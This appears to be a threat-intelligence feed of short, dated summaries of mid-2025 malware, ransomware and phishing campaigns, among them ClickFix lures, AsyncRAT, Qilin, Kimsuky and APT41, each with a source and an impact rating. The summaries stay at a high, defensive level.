Elastic researchers have identified a surge in ClickFix-based social engineering campaigns throughout 2025. These campaigns leverage deceptive CAPTCHA verification pages to trick users into executing malicious PowerShell commands. These campaigns initiate a multi-stage infection chain that delivers a RAT and infostealer called ARECHCLIENT2 also known as SectopRAT. The infection begins when a user interacts with the fake CAPTCHA page, leading to the execution of GHOSTPULSE loader. It employs DLL sideloading to evade detection and delivers encrypted payload. GHOSTPULSE runs a .NET-based loader that disables Windows security checks, decrypts embedded malware and loads ARECHCLIENT2 directly into the system memory. It targets credentials, cryptocurrency wallets, browser data and system reconnaissance while establishing persistent remote access.
Source: https://www.elastic.co/security-labs/a-wretch-client
2025-06-20
AsyncRAT_Campaign
MEDIUM
+
Intel Source:
Halcyon
Intel Name:
AsyncRAT_Campaign
Date of Scan:
2025-06-20
Impact:
MEDIUM
Summary:
Researchers at Halcyon have identified a financially motivated cybercriminal group conducting a widespread phishing campaign leveraging commodity RATs such as AsyncRAT, XWorm and Remcos. The campaign has been active since early 2024 and targets organizations globally across all sectors. The attack starts with phishing emails linking to Dropbox-hosted ZIP files that initiate a multi-stage infection process involving .URL and .LNK files, obfuscated batch scripts, and Python-based loaders. The attackers use temporary TryCloudflare tunnels to deliver the final malware payloads. These tunnels allow them to bypass traditional network defenses by exploiting legitimate services to hide their activity. The malware uses Python scripts to run from memory and uncommon system folders to evade both EPP and EDR solutions. The threat actors appear to function as initial access brokers, potentially selling access or deploying ransomware.
Source: https://www.halcyon.ai/blog/asyncrat-campaign-continues-to-evade-endpoint-detection
2025-06-20
SERPENTINE_CLOUD_Campaign
MEDIUM
+
Intel Source:
Securonix Threat Lab
Intel Name:
SERPENTINE_CLOUD_Campaign
Date of Scan:
2025-06-20
Impact:
MEDIUM
Summary:
Researchers at Securonix have uncovered an ongoing campaign named SERPENTINE#CLOUD leveraging Cloudflare Tunnel to secretly deliver Python-based malware. The attack starts with phishing emails containing ZIP archives that include malicious .LNK shortcut files disguised as invoice-themed PDFs. When clicked, these shorts execute hidden scripts that connect to attacker-controlled Cloudflare domains using WebDAV to download additional malicious files. The infection chain proceed through VBScript and batch files, eventually leading to Python-based loaders that execute malware directly in memory using Donut shellcode. The malware employs advanced obfuscation techniques, including character encoding, base64 and Python binary packer called Kramer. The final payload includes RATs like AsyncRAT or RevengeRAT which give attackers full control over compromised machines. The campaign has been observed targeting victims in the U.S., U.K., Germany and other Western countries.
Source: https://www.securonix.com/blog/analyzing_serpentinecloud-threat-actors-abuse-cloudflare-tunnels-threat-research/
2025-06-19
BERT_Ransomware_Targets_Windows_and_Linux
MEDIUM
+
Intel Source:
The Raven File
Intel Name:
BERT_Ransomware_Targets_Windows_and_Linux
Date of Scan:
2025-06-19
Impact:
MEDIUM
Summary:
Researchers at The Raven File have identified a new ransomware operation, known as BERT, which has been active since at least mid-March 2025. The group, which employs double extortion tactics, initially targeted Windows systems but expanded its capabilities in May 2025 to include a Linux variant that shares an 80% codebase match with the notorious Revil ransomware. Gaining initial access via phishing, the attackers deploy a multi-stage attack chain beginning with a PowerShell script that disables system defenses, including Windows Defender, the firewall, and UAC. Once security controls are neutralized, the ransomware payload is downloaded from Russian-controlled infrastructure and executed. Victims are geographically diverse, with a focus on the Service and Manufacturing sectors in the US, UK, and Asia.
Source: https://theravenfile.com/2025/06/16/bert-ransomware/
2025-06-19
Chaos_RAT_Targets_Windows_and_Linux
LOW
+
Intel Source:
Polyswarm
Intel Name:
Chaos_RAT_Targets_Windows_and_Linux
Date of Scan:
2025-06-19
Impact:
LOW
Summary:
Researchers from Acronis have uncovered new variants of the Chaos RAT, which has evolved from an open-source project into a versatile, cross-platform malware threat. Active campaigns since June 2025 target both Windows and Linux systems via phishing emails containing malicious PDF files. These documents lure users into clicking embedded links, initiating a multi-stage infection chain that deploys the final RAT payload. The malware's objectives are financial gain through the deployment of cryptominers and data theft, leveraging capabilities including keylogging, screen capture, file exfiltration, and full remote command execution. Chaos RAT employs complex obfuscation and anti-analysis techniques, such as checking for virtualized environments, to evade detection and hinder reverse engineering. Its ability to compromise both major operating systems with a full suite of intrusive tools creates a significant risk of data breaches and system degradation for a broad range of organizations.
Source: https://blog.polyswarm.io/new-chaos-rat-variants-observed
2025-06-18
MySQL_RAT_Campaign
LOW
+
Intel Source:
ASEC
Intel Name:
MySQL_RAT_Campaign
Date of Scan:
2025-06-18
Impact:
LOW
Summary:
Researchers at ASEC have uncovered an ongoing campaign targeting improperly secured MySQL servers, primarily those operating in Windows system. The attackers exploit exposed port 3306/TCP using brute-force and dictionary attacks to gain administrative access. Once compromised, they install various types of malwares, including GhostRAT, XWorm, HpLoader, and User Defined Function (UDF) based files. The use of UDF DLLs allows attackers to execute commands, download files, and load malware directly into memory. GhostRAT variants like GhostCringe and HiddenGh0st, are capable of privilege escalation and screen capture while Xworm, a modified remote access tool, can steal credentials, spread through USB devices and capture clipboard data. The attackers have also used legitimate tools like Zoho ManageEngine agents to maintain access without using traditional backdoors.
Source: https://asec.ahnlab.com/ko/88468/
2025-06-18
Qilin_RaaS_Fills_Ransomware_Power_Vacuum
MEDIUM
+
Intel Source:
Cybereason
Intel Name:
Qilin_RaaS_Fills_Ransomware_Power_Vacuum
Date of Scan:
2025-06-18
Impact:
MEDIUM
Summary:
Researchers from Cybereason have observed the Qilin ransomware-as-a-service (RaaS) operation emerging to fill a power vacuum created by the collapse of other major ransomware groups in early 2025. Qilin has been active since late 2022 but is rapidly gaining dominance by offering a sophisticated, full-service cybercrime platform to its affiliates. The operation uses cross-platform malware written in Rust for Windows and C for Linux to target a wide range of systems, with a specific focus on enterprise virtualization environments like VMware ESXi and Nutanix. Attackers gain initial access, then use tools like PsExec for lateral movement, abuse PowerShell for privilege escalation, and execute scripts to disable hypervisor functions, terminate virtual machines, and delete backups before encrypting data.
Source: https://www.cybereason.com/blog/threat-alert-qilin-seizes-control
2025-06-17
Kimsuky_Targets_Academics_via_Phishing_Campaign
MEDIUM
+
Intel Source:
ASEC
Intel Name:
Kimsuky_Targets_Academics_via_Phishing_Campaign
Date of Scan:
2025-06-17
Impact:
MEDIUM
Summary:
ASEC researchers have uncovered a new phishing campaign by North Korean state-sponsored group called Kimsuky targeting professionals by impersonating thesis reviewers. They send phishing emails containing malicious password-protected Hangul Word Processor (HWP) documents. When the victim opens the file and enables content, it drops multiple files into the system’s temporary directory, including a BAT script that initiates a multi-stage infection process. This process installs a PowerShell script that collects system and antivirus data, exfiltrates the data to a Dropbox account controlled by the attackers and downloads additional payloads. The malware also abuses the legitimate remote access software AnyDesk by altering its configuration files with attacker-controlled versions, effectively all visual signs like tray icons and windows are hidden. Additionally, the attackers leverage scheduled task abuse, encoded payloads, and a step-by-step method to stay hidden and maintain access.
Source: https://asec.ahnlab.com/ko/88419/
2025-06-17
Go_Based_SSH_Botnet_Targets_Linux_Systems
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Go_Based_SSH_Botnet_Targets_Linux_Systems
Date of Scan:
2025-06-17
Impact:
LOW
Summary:
Researchers at ISC.SANS have identified a global, automated attack campaign targeting internet-exposed Linux systems with weak SSH credentials. The threat actor, utilizing a Go-based tool, brute-forces access and executes a multi-stage infection to establish persistent control. Observed on April 29, 2025, the attack involves deploying architecture-specific malware variants for ARM and x86 systems, indicating a clear focus on compromising a wide range of devices, including the Internet of Things (IoT) ecosystem. After gaining initial access, the attacker installs an SSH key backdoor and uses the chattr command to make the authorized_keys file immutable, significantly hindering remediation efforts.
Source: https://isc.sans.edu/diary/rss/32024
2025-06-16
Mirai_Variant_Exploits_DVRs_via_CVE_2024_3721
LOW
+
Intel Source:
Securelist
Intel Name:
Mirai_Variant_Exploits_DVRs_via_CVE_2024_3721
Date of Scan:
2025-06-16
Impact:
LOW
Summary:
Researchers from Securelist have observed a new Mirai botnet variant actively exploiting a remote code execution vulnerability (CVE-2024-3721) in internet-exposed TBK DVR devices. The campaign uses a crafted POST request to download and execute a malicious ARM32 binary, immediately compromising the device without reconnaissance. The malware is a Mirai variant enhanced with anti-evasion features, including RC4-encrypted strings and checks to detect virtualization and emulation environments.
Source: https://securelist.com/mirai-botnet-variant-targets-dvr-devices-with-cve-2024-3721/116742/
2025-06-16
Mamba2FA_Credential_Harvesting_Campaign
LOW
+
Intel Source:
Spider Labs
Intel Name:
Mamba2FA_Credential_Harvesting_Campaign
Date of Scan:
2025-06-16
Impact:
LOW
Summary:
Researchers at SpiderLabs have identified an active phishing campaign leveraging a Phishing-as-a-Service (PhaaS) kit known as Mamba2FA. The attack begins with a lure themed as a "Secure Document Portal," designed to trick victims into entering their email address to access a purported document. Upon submission, the user is redirected to a counterfeit Microsoft login page for credential harvesting. The use of a PhishKit and PhaaS infrastructure indicates a commoditized and scalable threat, enabling less-skilled actors to deploy effective attacks.
Source: https://x.com/SpiderLabs/status/1932844577355939890
2025-06-16
Spectra_Ransomware_Double_Extortion
MEDIUM
+
Intel Source:
K7 Labs
Intel Name:
Spectra_Ransomware_Double_Extortion
Date of Scan:
2025-06-16
Impact:
MEDIUM
Summary:
Researchers from K7 Security Labs have observed Spectra Ransomware, an emerging double-extortion threat targeting Windows-based systems. Attackers demand a $5,000 Bitcoin payment within a 72-hour deadline, threatening to leak stolen data if victims do not comply. The malware achieves persistence by creating a Run registry key and masquerading as svchost.exe in the AppData folder.
Source: https://labs.k7computing.com/index.php/the-spectre-of-spectraransomware/
2025-06-16
Fileless_AsyncRAT_via_Clickfix_Lure
LOW
+
Intel Source:
cloudsek
Intel Name:
Fileless_AsyncRAT_via_Clickfix_Lure
Date of Scan:
2025-06-16
Impact:
LOW
Summary:
Researchers at CloudSEK have identified an active fileless malware campaign distributing AsyncRAT to German-speaking users. The attack, ongoing since at least April 2025, begins with a Clickfix-themed website that socially engineers victims into executing a malicious PowerShell command through a fake CAPTCHA prompt. The initial command downloads a second-stage, obfuscated PowerShell script, which then decodes and reflectively loads a C# AsyncRAT payload directly into memory, evading file-based detection. The malware leverages legitimate system utilities like conhost.exe and PowerShell for stealthy execution, establishes persistence via RunOnce registry keys, and communicates with a command-and-control server over TCP port 4444.
Source: https://www.cloudsek.com/blog/fileless-asyncrat-distributed-via-clickfix-technique-targeting-german-speaking-users
2025-06-16
Katz_Stealer
LOW
+
Intel Source:
Picussecurity
Intel Name:
Katz_Stealer
Date of Scan:
2025-06-16
Impact:
LOW
Summary:
Researchers from Picus have uncovered new information-stealing malware-as-a-service (MaaS) that emerged in 2025. The malware is distributed via phishing campaigns and trojanized software. It leverages multi-stage infection chain that includes obfuscated JavaScript droppers, PowerShell loaders and .NET-based UAC bypass techniques. The malware runs entirely in memory, hides inside legitimate Windows processes and uses images to secretly run malicious code. Once inside the system, it targets web browsers like Chrome and Firefox, email accounts, VPN services, file transfer programs and cryptocurrency wallets. Additionally, It takes control of Discord by injecting malicious code that runs every time the app starts, giving attackers remote access to the system.
Source: https://www.picussecurity.com/resource/blog/understanding-katz-stealer-malware-and-its-credential-theft-capabilities
2025-06-16
APT41_Uses_Google_Calendar_for_C2
MEDIUM
+
Intel Source:
Resecurity
Intel Name:
APT41_Uses_Google_Calendar_for_C2
Date of Scan:
2025-06-16
Impact:
MEDIUM
Summary:
Researchers from Resecurity have uncovered that the Chinese state-sponsored threat actor called APT 41 which is involved in both espionage and cybercrime, has launched a new campaign leveraging Google Calendar as a covert C2 channel. The threat actor gains initial access through spear phishing emails containing a ZIP archive disguised as export documentation which includes malicious LNK files and decoy images. Upon execution, a series of malware components - PLUSDROP, PLUSINJECT, and TOUGHPROGRESS activate and run directly in the system’s memory, using process hollowing, and hiding inside legitimate system processes to avoid detection. The final payload TOUGHPROGRESS, communicates with attacker-controlled Google Calendar events to receive commands and sends stolen data back by writing it into new calendar entries. This malware is highly advanced and capable of altering the Windows operating system, which could allow the attackers to take full control of the system and erase traces of their activity.
Source: https://www.resecurity.com/blog/article/apt-41-threat-intelligence-report-and-malware-analysis
2025-06-16
Hive0131_Targets_Latin_America
MEDIUM
+
Intel Source:
IBM X-Force
Intel Name:
Hive0131_Targets_Latin_America
Date of Scan:
2025-06-16
Impact:
MEDIUM
Summary:
Researchers at IBM X-Force have identified a surge in cyber-attacks involving DCRat across Latin America. These attacks are attributed to the financially motivated threat group Hive0131. The group send phishing emails impersonating Colombian judicial entities to tricks recipient into clicking on malicious links embedding in PDFs and Google Docs to initiate infection chains. These phishing campaigns deliver DCRat, a Malware-as-a-Service (MaaS) tool via obfuscated loaders such as VMDetectLoader which employs virtual machine detection, AMSI bypass and process hollowing to evade detection. The malware is capable of surveillance, data exfiltration, command execution and persistence through scheduled tasks or registry keys. Researchers also observed that the attackers use various methods such as JavaScript and VBScript to distribute the malware. Hive0131 appears to be shifted from traditional RATs like QuasarRAT and NjRAT to more advanced payloads like DCRat which make detection and removal more difficult.
Source: https://www.ibm.com/think/x-force/dcrat-presence-growing-in-latin-america
2025-06-16
Anubis_RaaS_Group
MEDIUM
+
Intel Source:
Trend Micro
Intel Name:
Anubis_RaaS_Group
Date of Scan:
2025-06-16
Impact:
MEDIUM
Summary:
Trend Micro researchers have discovered new ransomware strain called Anubis which operates as a ransomware-as-a-service (RaaS) operation active since December 2024. It includes a file-wiping feature alongside traditional encryption, creating a dual-threat approach that puts extra pressure on victims to pay the ransom. Anubis affiliates gain access through spear-phishing campaigns and leverage advanced techniques such as privilege escalation, access token manipulation and shadow copy deletion to prevent recovery. Anubis has targeted organizations in various sectors, especially healthcare and construction with confirmed attacks in countries including Australia, Canada, Peru and the U.S. The group operates on cybercrime forums such as RAMP and XSS, offering flexible affiliate programs to other cybercriminal groups.
Source: https://www.trendmicro.com/en_us/research/25/f/anubis-a-closer-look-at-an-emerging-ransomware.html
2025-06-16
ClickFix_Social_Engineering_Attack_Chain
LOW
+
Intel Source:
Darktrace
Intel Name:
ClickFix_Social_Engineering_Attack_Chain
Date of Scan:
2025-06-16
Impact:
LOW
Summary:
Researchers from Darktrace have observed threat actors, including APT groups like APT28 and MuddyWater, leveraging a social engineering tactic dubbed "ClickFix" to gain initial access and exfiltrate data from organizations. This prolific campaign, observed in early 2025 across EMEA and the United States, targets the human user as the weakest link through phishing or malvertising that directs victims to a fake prompt, such as a CAPTCHA or error message. These prompts trick users into manually executing a malicious PowerShell command, which establishes command and control (C2) communication. This allows attackers to download secondary payloads like XWorm or Lumma, move laterally, and exfiltrate sensitive system information.
Source: https://www.darktrace.com/blog/unpacking-clickfix-darktraces-detection-of-a-prolific-social-engineering-tactic
2025-06-16
Water_Curse_GitHub_Malware_Campaign
MEDIUM
+
Intel Source:
Trend Micro
Intel Name:
Water_Curse_GitHub_Malware_Campaign
Date of Scan:
2025-06-16
Impact:
MEDIUM
Summary:
Researchers from Trend Micro have uncovered a broad supply chain campaign conducted by a financially motivated threat actor tracked as Water Curse, targeting developers, security professionals, and gamers. The actor leverages at least 76 weaponized GitHub repositories to deliver multistage malware. The initial attack vector involves tricking users into downloading and compiling seemingly legitimate open-source tools, where malicious code embedded in Visual Studio project files executes during the build process. This initiates a complex infection chain using VBS and PowerShell scripts to deploy an Electron-based backdoor, which performs privilege escalation through UAC bypass, establishes persistence via scheduled tasks, and disables security defenses like Windows Defender and Volume Shadow Copies.
Source: https://www.trendmicro.com/en_us/research/25/f/water-curse.html
2025-06-12
Fog_Ransomware_Employs_Unusual_Toolset
MEDIUM
+
Intel Source:
Symantec
Intel Name:
Fog_Ransomware_Employs_Unusual_Toolset
Date of Scan:
2025-06-12
Impact:
MEDIUM
Summary:
Symantec researchers have reported attack against a financial institution in Asia involving the Fog ransomware. The operators demonstrated an unusual methodology, blending ransomware deployment with espionage-style tactics. After an approximate two-week dwell time, the attackers deployed a unique toolset including the legitimate employee monitoring software Syteca for spying, and open-source C2 frameworks like GC2 and Adaptix for command and control. Notably, the threat actors established persistence via a new service after deploying the ransomware, a clear deviation from typical smash-and-grab ransomware behavior. This post-encryption activity suggests a dual motive: the ransomware may have been a decoy for a more persistent espionage operation, or an opportunistic monetization of an existing intrusion.
Source: https://www.security.com/threat-intelligence/fog-ransomware-attack
2025-06-12
DCRat_Targeting_Blockchain_Users
LOW
+
Intel Source:
Qi'anxin Threat Intelligence Center
Intel Name:
DCRat_Targeting_Blockchain_Users
Date of Scan:
2025-06-12
Impact:
LOW
Summary:
Qi'anxin Threat Intelligence Center and the Skyrocket Falcon team have identified a financially motivated campaign targeting blockchain and cryptocurrency users. Unknown attackers deliver a malicious ZIP archive containing a shortcut file (LNK) via the Telegram messaging application. Execution of the lure file initiates a multi-stage infection process that uses VBScript and PowerShell to download components from cloud storage. The attack leverages DLL side-loading, using legitimately signed executables to load a malicious DLL, which then loads and injects the DCRat remote access trojan (RAT) into memory. This methodology is designed to evade detection by traditional security tools. The attackers' infrastructure also hosts fraudulent cryptocurrency investment websites, indicating the primary objective is theft.
Source: https://ti.qianxin.com/blog/articles/counterfeiting-qianxin-certificates-targeted-attacks-against-blockchain-customers-en/
2025-06-12
Italian_Remcos_Malware_Campaign
MEDIUM
+
Intel Source:
CERT-AGID
Intel Name:
Italian_Remcos_Malware_Campaign
Date of Scan:
2025-06-12
Impact:
MEDIUM
Summary:
Researchers at cert agid have identified a malware campaign targeting Italy, active around June 10-11, 2025. Threat actors are distributing the Remcos Remote Access Trojan (RAT) via email, using malicious ZIP file attachments. The campaign leverages a financial lure with an email subject of "AV: Avviso di pagamento" (Payment notice) to trick recipients into executing the payload. The use of the "ModiLoader" tag suggests a potential multi-stage infection chain. The primary motivation appears to be financial, using the RAT's capabilities for credential theft, data exfiltration, and full remote control of compromised systems.
Source: https://cert-agid.gov.it/wp-content/uploads/2025/06/remcos-11-06-2025.json
2025-06-12
Arkana_Ransomware_Exfiltrates_Brokerage_Data
MEDIUM
+
Intel Source:
ASEC
Intel Name:
Arkana_Ransomware_Exfiltrates_Brokerage_Data
Date of Scan:
2025-06-12
Impact:
MEDIUM
Summary:
Researchers from ASEC have observed the Arkana ransomware group claiming responsibility for a significant data breach targeting in a UK-based global online brokerage firm. The group exfiltrated approximately 50 GB of data, including sensitive Know Your Customer (KYC) records and customer information, and threatened to leak or sell the dataset if a ransom was not paid by June 10, 2025. This double-extortion attack, publicized on the group's dedicated leak site, was focused on monetizing the stolen information. The incident highlights a severe threat to the financial sector, where exfiltrated KYC data presents a high risk of identity theft and fraud.
Source: https://asec.ahnlab.com/en/88437/
2025-06-12
Winos_4_0_Behind_Operation_Holding_Hands
MEDIUM
+
Intel Source:
somedieyoungZZ
Intel Name:
Winos_4_0_Behind_Operation_Holding_Hands
Date of Scan:
2025-06-12
Impact:
MEDIUM
Summary:
Researcher somedieyoungZZ have detailed the 'Operation Holding Hands' campaign, a multi-stage attack attributed to the China-linked Silver Fox APT group. Targeting users in Japan and Taiwan, the campaign begins with a phishing lure—a digitally signed executable masquerading as a salary revision notice. This initial payload leverages its stolen certificate to appear legitimate while it drops and unpacks subsequent stages using COM objects. The malware employs sophisticated evasion techniques, including DLL search order hijacking and dynamic API resolution via configuration files, to minimize its forensic footprint. The final payload is a memory-resident backdoor, identified as Winos 4.0, which connects to hardcoded C2 infrastructure for persistent access and espionage.
Source: https://somedieyoungzz.github.io/posts/silver-fox/
2025-06-12
BrowserVenom_Spreads_Via_Fake_AI_Download_Ads
LOW
+
Intel Source:
Securelist
Intel Name:
BrowserVenom_Spreads_Via_Fake_AI_Download_Ads
Date of Scan:
2025-06-12
Impact:
LOW
Summary:
Researchers from Securelist have identified a new malware campaign leveraging the DeepSeek-R1 LLM to distribute an implant dubbed BrowserVenom. The threat actors are believed to be Russian speaking based on code comments, use malicious online ads to lure people searching for DeepSeek r1 are redirected to a fake site that delivers a trojanized installer named AI_Launcher_1.21.exe. When executed, the file starts a multi-stage infection process involving fake CAPTCHA screens, PowerShell-based defense evasion, and downloads and installs the final payload called BrowserVenom which installs a malicious certificate and silently changes the settings of all major web browsers. The campaign has been observed in Brazil, Cuba, Mexico, India, Nepal, South Africa and Egypt, showing a wide geographical distribution.
Source: https://securelist.com/browservenom-mimicks-deepseek-to-use-malicious-proxy/115728/
2025-06-12
Quasar_RAT_via_Obfuscated_Batch_Files
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Quasar_RAT_via_Obfuscated_Batch_Files
Date of Scan:
2025-06-12
Impact:
LOW
Summary:
Researchers at ISC.SANS have identified an active campaign delivering the Quasar Remote Access Trojan (RAT) through a multi-stage infection process. Threat actors initiate the attack with a simple batch script that opens a decoy document to deceive the user while concurrently using PowerShell to download and execute a second, heavily obfuscated batch file.
Source: https://isc.sans.edu/diary/rss/32036
2025-06-11
CYBEREYE_RAT
LOW
+
Intel Source:
Cyfirma
Intel Name:
CYBEREYE_RAT
Date of Scan:
2025-06-11
Impact:
LOW
Summary:
Cyfirma researchers have identified a new .NET-based malware called CyberEye also known as TelegramRAT which is actively distributed through GitHub repository and Telegram channels operated by threat actors using the aliases @cisamu123 and @CodQu. The malware is deployed through a GUI-based builder that enables low-skill cybercriminals to generate customized payloads with features such as keylogging, credential theft, clipboard hijacking and persistence mechanisms. CyberEye uses Telegram to communicate with attackers, so they don’t need to set up their own servers. It turns off Windows Defender using system settings and PowerShell commands and attempts to gain higher system privileges. It steals saved passwords from browsers, session data from apps like Telegram, Discord, and Steam and sends sensitive files and screenshots back to the attacker.
Source: https://www.cyfirma.com/research/understanding-cybereye-rat-builder-capabilities-and-implications/